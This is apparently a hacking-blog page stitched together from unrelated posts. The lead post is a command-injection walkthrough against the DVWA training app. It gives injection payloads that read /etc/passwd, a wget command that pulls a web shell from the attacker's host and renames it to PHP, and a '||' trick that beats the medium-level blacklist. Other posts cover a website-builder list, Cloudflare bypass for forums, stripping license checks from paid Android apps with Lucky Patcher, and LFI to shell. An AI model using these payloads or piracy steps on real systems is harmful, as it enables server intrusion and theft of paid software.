C0mmand Executi0n Tut0rial - DVWA Low & Medium Lever

************THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY*************

Hello guys,
Today I'll be showing you how to exploit command execution vulnerabilities. I will perform this attack on DVWA (Damn Vulnerable Web App) It can be downloaded and installed easily. But for those who are following my tutorials, installing Metasploitable-Linux is enough, because it's installed in it; just open the IP in your browser and click on DVWA.
The default username and password for it are:
User: admin
Password: password

Command execution can be the most dangerous venerability you can find in a website/server. It will allow you to simply backconnect with netcat, or upload your shell in a matter of seconds!
Command execution will allow you to execute commands on the target server whether it's Windows or Linux.

So lets start exploiting!

Lets start with the Low level in DVWA.

The source is:

<?php

if( isset( $_POST[ 'submit' ] ) ) {

$target = $_REQUEST[ 'ip' ];

// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';

}

}
?>

As you can see in the code above, it didn't run anything to check if your input is an IP, or if it has '&&' '||' or ';', and those characters means AND, OR, and the sumicolon means the end of a command.
So lets try to run something like:

google.com && ls

The output will be like the image bellow:

Note that a list of files were printed after the ping result. That's what the command "ls" do! So it's working, now lets have more fun!

Execute this command:

google.com && uname -a && id && cat /etc/passwd

Well, it's time to own the system now! The commands are executing with no errors. Lets try to get a shell on their system; for that we need a shell in .txt on a different server. I have a shell on my localhost, so lets use that:

All you have to do is run wget to get the shell, then change the name from SecurityGeeks.txt to SecurityGeeks.php
this command will do it all:

google.com && wget YOUR_IP_ADDRESS/SecurityGeeks.txt && mv SecurityGeeks.txt SecurityGeeks.php

wget will get the shell, mv will change the name. You can get your IP address by running "ipconfig" in windows CMD or "ifconfig" in linux terminal.

So lets try!

Command ran successfully, lets check if our shell is there!

The shell will be in the same directory you're in, so just add /YourShellName.php to the link!

Nice! Now you have full, and easier to use shell access! and Also you get root access if you followed my Metasploit tutorials you'll know how!

OK! now we got the low lever, lets switch to the medium level in DVWA and try to get the same access we got now!

In medium level, they added a little bit of security to the code, but its not enough.
The code in medium is:

<?php

if( isset( $_POST[ 'submit'] ) ) {

$target = $_REQUEST[ 'ip' ];

// Remove any of the charactars in the array (blacklist).
$substitutions = array(
'&&' => '',
';' => '',
);

$target = str_replace( array_keys( $substitutions ), $substitutions, $target );

// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';

}
}

?>

As you can see in the code above, they banned the characters ';' and '&&' but it's not really enough because we have another option which is '||'

But it's a little different with this one, because it means OR. So the shell doesn't always execute it when there is another command before it. So the way to use this one will be different than before, we wont add "google.com" then '&& COMMAND' but we will put '|| COMMAND' without anything before it!

Let's just give it a try and see if it's working!

the command 'ls' is working, everything is going fine!
But now, you'll need to use one ONLY command each time.

Hope you enjoyed it!

READ MORE!

Top 10 Easy And Powerful Website Building Software

People, who do not have any technical knowledge, can take advantage of the website building
tools. These tools can be of great help when you want to get your work done. All of the people
who are students, workers, designers, developers, artists, supervisor or homemakers etc. can
use these tools as they are simple and highly advantageous. Most of the tools are not popular
but the features they offer are amazing.

Today everybody searches the internet for his or her queries. This has made the necessary of
the every business to have an online presence. Building a website is considered a tough job but
not now with the help of these top ten powerful and easy website building software’s.

1. Icono Sites

This tool is easy and free to create websites. It will just take a few minutes with the building
option on the website. You can choose the website designs of your choice from a bouquet of
beautiful layouts.

2. Google sites

This is the simplest but powerful tool to build up sites. This tool offers you with the different
choices of the pre-built templates. You can also access and share information with other
administration.

3. Tripod

This tool is powered by Zeeblio which enables the drag and drop abilities. It offers 200
templates from which you can choose your design. This tool is best for eCommerce sites.

4. Doomby

You can easily create your websites easily with this tool without paying any money. This tool
also offers powerful and effective back end. It also offers you with the correct website statistics.

5. Ucoz

This is the first choice of millions of website users. It provides you with 22 modules and 250
templates. This tool is best for the people having a limited budget.

6. Webnode

This tool allows its users to develop, run, design and create free web applications and websites
from beginning to end. This tool can produce high quality professional pages.

7. Snap pages

You can create free and your own personal website with this tool. You can also share your
images, blogs and other stuff with friends and family. The tool is simple and easy to use. For
professional site design, you can subscribe to the premium version.

8. Webriq

This tool is free and you can optimize your site with your mobile browser. It has both the free
and premium version.

9. 350

Those who do not have any knowledge about the languages of computer are highly benefitted
with this tool. You can try the demo version and then subscribe to the premium version.

10. Weebly

With the help of this tool, you will get the simplest way to create a website. This tool enables
the users to spend most of the time on content, which is its best feature.

Try all these tools which and their different features. Web sites are the great mediums by which
you can attract lots of customers and showcase your products and services and these tools will
help you getting your target.

---

About The Author: Claudia is a blogger and she has written various articles on Hadoop Online Training and other training programs. She is also an author of many books, follow me @ITdominus1.

READ MORE!

How To Bypass vBulletin Forums Cloudflare - New Method

Hello guys,
Another video tutorial by Foloox on how to bypass cloudflare. New cool methods that I've never used. :)
The tutorial is on his channel, please subscribe to his channel!

The script used in the second method can be found here:
http://pastie.securitygeeks.net/47


The video is AVAILABLE in HD, just change the quality! Enjoy! ^_^

READ MORE!

How To Remove The License Verification From Android App/Games Using Lucky Patcher

Hello guys, Today I'm going to show you how to remove the license verification from apps and games. License Verification can be found in all paid apps, to check if you actually bought the app/game or downloaded it from somewhere else. Well, today we will remove that license verification and use paid apps for free, or most of them.

For this tutorial we will be using AfterMath XHD, which is a paid game on Google Play, as a demo.

For this tutorial we need:

• Rooted Android Device
• Lucky Patcher (Can Be Downloaded here)
• A Paid game to try to remove the License Verification from it

So, before I remove the license from the game, the game doesn't start because our license is invalid
As you can see in the picture bellow:

Now launch Lucky Patcher, it WILL need root permissions so let it grant the root permissions. When it opens it shows the list of all the apps with Google Ads, License Verification, and some more. (You can see my tutorial about remove Google ads from apps HERE)

Click on the app or the game you want to patch, a screen with some information about the game will show, like the picture bellow:

Click on "Open Menu Of Patches" in the bottom of the page:

Click on "Remove License Verification" a list of patches will show

The patch you chose will be already selected for you, so just click on Apply, it will start processing

Now all you have to do is wait until it finishes and give you the result:

You're done! Now launch the app you patched, and it will work just fine!

This process can patch many apps, including famous ones like SPB Shell 3D! And the game above is one of top paid games in Google Store too.
Have fun, and try patching the apps you want!
Enjoy!

READ MORE!

Local File Inclusion To Php Shell - LFI Tutorial

Hello guys,
Today I have another tutorial Submitted by Foloox Csl. It's a simple LFI Tutorial, to upload a shell using LFI Vulnerability

Enjoy! And please subscribe to him.



Best Watched in HD!

READ MORE!